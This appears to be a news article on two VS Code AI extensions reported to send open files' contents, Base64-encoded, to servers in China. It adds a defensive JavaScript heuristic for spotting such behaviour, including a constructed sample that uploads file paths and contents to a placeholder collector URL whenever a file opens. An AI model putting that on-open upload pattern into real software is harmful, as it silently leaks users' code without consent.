You use extensions to enhance your development experience in Visual Studio Code, but do you really know what is happening in the background? Imagine your code being sent to remote servers without your knowledge. Intrigued? Discover how the ChatGPT – 中文版 and ChatMoss extensions could compromise your work.
The 3 must-know facts
The ChatGPT – 中文版 and ChatMoss extensions, available on the Visual Studio Code Marketplace, are known for providing code suggestions and completions. However, Koi Security revealed that these tools discreetly send the content of open files to servers located in China. The user's data is exfiltrated in the background without their knowledge.
Researchers discovered that as soon as a file is opened with these extensions active, its content is encoded in Base64 and transmitted. This process, carried out without any alert or request for consent, jeopardizes the confidentiality of user data.
ChatGPT – 中文版 and ChatMoss do not just function as simple code editing tools. The extensions are capable of transmitting commands that trigger the sending of multiple files from the same project. The data sent includes not only the content of the files but also their location, allowing the entire structure of a Visual Studio Code project to be reconstructed.
According to BleepingComputer, the integration of analytics SDKs in these extensions allows for the collection of information on user activity, such as files viewed or modified. The exfiltration process continues as long as the extensions remain active, making detection difficult without a thorough technical inspection.
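One form such an inspection can take is shown below as an added example. It is not code from Koi Security, BleepingComputer or the extensions themselves. It flags extension source in which an automatic file-open or file-change handler, a read of document content, and an outbound network call all appear, and escalates when Base64 encoding is also present. The signal names, regexes, verdict labels and both sample extensions are assumptions constructed for this sketch.

```javascript
// Added example: heuristic triage of one VS Code extension's JavaScript.
// Signal names and regexes are assumptions of this sketch, not published indicators.
const SIGNALS = {
  // Handlers that fire on file open/edit/focus, or workspace-wide file enumeration.
  fileTrigger: /\b(onDidOpenTextDocument|onDidChangeTextDocument|onDidChangeActiveTextEditor|findFiles)\b/,
  // Reads of whole document or file contents.
  readsContent: /\.getText\s*\(|\breadFile(Sync)?\s*\(/,
  // Base64 encoding, as described for the transmitted file content.
  base64: /toString\s*\(\s*['"]base64['"]\s*\)|\bbtoa\s*\(/,
  // Outbound network primitives.
  network: /\bfetch\s*\(|\bXMLHttpRequest\b|\bhttps?\.request\s*\(|\baxios\b|\bWebSocket\b/,
  // References to a document's path (its location in the project).
  usesPath: /\.fileName\b|\.fsPath\b/,
};

// sources: array of JS file contents from a single extension. Signals are
// unioned across files because bundlers split handlers from network helpers.
function triageExtension(sources) {
  const hits = Object.keys(SIGNALS).filter((name) =>
    sources.some((src) => SIGNALS[name].test(src)));
  const has = (name) => hits.includes(name);
  let verdict = 'no-match';
  // Automatic trigger + content read + network is the pattern worth a manual look.
  if (has('fileTrigger') && has('readsContent') && has('network')) {
    verdict = has('base64') ? 'review-urgently' : 'review';
  }
  return { verdict, hits };
}

// Constructed sample: two files of a hypothetical extension that uploads on open.
const SUSPECT = [
  `vscode.workspace.onDidOpenTextDocument((doc) => upload(doc.fileName, doc.getText()));`,
  `function upload(path, text) {
     const body = Buffer.from(text).toString('base64');
     return fetch(COLLECTOR_URL, { method: 'POST', body: JSON.stringify({ path, body }) });
   }`,
];

// Constructed sample: an assistant that sends the selection only when the user runs a command.
const ON_DEMAND = [
  `vscode.commands.registerCommand('demo.explain', () => {
     const ed = vscode.window.activeTextEditor;
     return fetch(API_URL, { method: 'POST', body: ed.document.getText(ed.selection) });
   });`,
];

console.log(triageExtension(SUSPECT).verdict, triageExtension(ON_DEMAND).verdict);
```

Feed it the `.js` files from an installed extension's folder (by default under `~/.vscode/extensions/`). A `no-match` result on minified or obfuscated code proves nothing, so treat the output as a way to prioritize manual review.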
Microsoft has confirmed that it is aware of Koi Security’s findings and is currently conducting an investigation. Despite this, the implicated extensions remain available on the Visual Studio Code Marketplace, raising questions about the platform’s extension verification mechanisms.
For developers, this situation highlights the importance of verifying the security of the tools used in their work environment. It is imperative to be vigilant about downloaded extensions and to stay informed about platform security practices.
Visual Studio Code, launched by Microsoft in 2015, quickly became one of the most popular code editors thanks to its flexibility and wide range of extensions. Its marketplace offers thousands of extensions that enhance the developer experience, ranging from productivity tools to specific language integrations.
With the rise of artificial intelligence, AI-based extensions like ChatGPT – 中文版 and ChatMoss have gained popularity by offering advanced code completion features. However, this case underscores the need for developers to be mindful of the security implications of the tools they choose to integrate into their workflows.